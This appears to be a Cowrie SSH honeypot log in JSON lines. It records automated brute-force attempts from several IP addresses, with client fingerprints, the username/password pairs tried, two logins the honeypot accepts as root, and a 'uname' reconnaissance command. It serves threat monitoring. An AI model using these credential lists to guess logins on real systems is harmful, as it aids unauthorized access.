{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:20:59.038018Z","src_ip":"45.125.211.194","session":"a32522674c5d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:20:59.199970Z","src_ip":"45.125.211.194","session":"a32522674c5d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:00.037879Z","src_ip":"45.125.211.194","session":"a32522674c5d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:01.250027Z","src_ip":"45.125.211.194","session":"a32522674c5d"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":55818,"dst_ip":"1.2.3.4","dst_port":22,"session":"297680f23dde","protocol":"ssh","message":"New connection: 194.233.79.134:55818 (1.2.3.4:22) [session: 297680f23dde]","sensor":"my-vps","timestamp":"2025-08-28T03:21:01.809405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:01.811094Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:01.986904Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44496,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd7b07b3631f","protocol":"ssh","message":"New connection: 212.227.125.160:44496 (1.2.3.4:22) [session: dd7b07b3631f]","sensor":"my-vps","timestamp":"2025-08-28T03:21:02.316337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:02.317172Z","src_ip":"212.227.125.160","session":"dd7b07b3631f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:02.544569Z","src_ip":"212.227.125.160","session":"dd7b07b3631f"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:03.229036Z","src_ip":"212.227.125.160","session":"dd7b07b3631f"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:21:03.621478Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:21:04.427483Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:21:04.429036Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:04.458642Z","src_ip":"212.227.125.160","session":"dd7b07b3631f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:04.600732Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:04.601749Z","src_ip":"194.233.79.134","session":"297680f23dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54936,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bed1e17d72f","protocol":"ssh","message":"New connection: 212.227.125.160:54936 (1.2.3.4:22) [session: 1bed1e17d72f]","sensor":"my-vps","timestamp":"2025-08-28T03:21:08.067039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:08.068164Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:08.288414Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:21:08.940387Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:21:09.389786Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:21:09.390452Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:09.607759Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:09.608915Z","src_ip":"212.227.125.160","session":"1bed1e17d72f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":9895,"dst_ip":"1.2.3.4","dst_port":22,"session":"326457391b71","protocol":"ssh","message":"New connection: 45.125.211.194:9895 (1.2.3.4:22) [session: 326457391b71]","sensor":"my-vps","timestamp":"2025-08-28T03:21:13.876430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:13.882188Z","src_ip":"45.125.211.194","session":"326457391b71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:14.087924Z","src_ip":"45.125.211.194","session":"326457391b71"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:14.916084Z","src_ip":"45.125.211.194","session":"326457391b71"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:16.126216Z","src_ip":"45.125.211.194","session":"326457391b71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":7148,"dst_ip":"1.2.3.4","dst_port":22,"session":"064b563fecda","protocol":"ssh","message":"New connection: 212.227.125.160:7148 (1.2.3.4:22) [session: 064b563fecda]","sensor":"my-vps","timestamp":"2025-08-28T03:21:17.274749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:21:17.275620Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:21:17.356636Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.login.failed","username":"minh","password":"minh","message":"login attempt [minh/minh] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:17.764900Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abc123","message":"login attempt [minh/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:18.849041Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abcd123","message":"login attempt [minh/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:19.932018Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abcd1234","message":"login attempt [minh/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:21.015590Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.login.failed","username":"minh","password":"abc1234","message":"login attempt [minh/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:22.101047Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:23.184867Z","src_ip":"212.227.125.160","session":"064b563fecda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40674,"dst_ip":"1.2.3.4","dst_port":22,"session":"80e49e8f68b5","protocol":"ssh","message":"New connection: 212.227.235.229:40674 (1.2.3.4:22) [session: 80e49e8f68b5]","sensor":"my-vps","timestamp":"2025-08-28T03:21:28.068172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:28.069154Z","src_ip":"212.227.235.229","session":"80e49e8f68b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:28.321053Z","src_ip":"212.227.235.229","session":"80e49e8f68b5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":49522,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ddf2e2cab53","protocol":"ssh","message":"New connection: 45.125.211.194:49522 (1.2.3.4:22) [session: 4ddf2e2cab53]","sensor":"my-vps","timestamp":"2025-08-28T03:21:28.792334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:28.810762Z","src_ip":"45.125.211.194","session":"4ddf2e2cab53"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:29.010813Z","src_ip":"45.125.211.194","session":"4ddf2e2cab53"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:29.074749Z","src_ip":"212.227.235.229","session":"80e49e8f68b5"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T03:21:29.833928Z","src_ip":"45.125.211.194","session":"4ddf2e2cab53"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:30.326300Z","src_ip":"212.227.235.229","session":"80e49e8f68b5"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:21:31.043515Z","src_ip":"45.125.211.194","session":"4ddf2e2cab53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50668,"dst_ip":"1.2.3.4","dst_port":22,"session":"200daff891e0","protocol":"ssh","message":"New connection: 212.227.125.160:50668 (1.2.3.4:22) [session: 200daff891e0]","sensor":"my-vps","timestamp":"2025-08-28T03:21:37.038336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:21:37.040763Z","src_ip":"212.227.125.160","session":"200daff891e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:21:37.254860Z","src_ip":"212.227.125.160","session":"200daff891e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46105,"dst_ip":"1.2.3.4","dst_port":22,"session":"48fe6b6948e8","protocol":"ssh","message":"New connection: 212.227.235.229:46105 (1.2.3.4:22) [session: 48fe6b6948e8]","sensor":"my-vps","timestamp":"2025-08-28T03:21:37.880764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:21:38.216546Z","src_ip":"212.227.235.229","session":"48fe6b6948e8"}
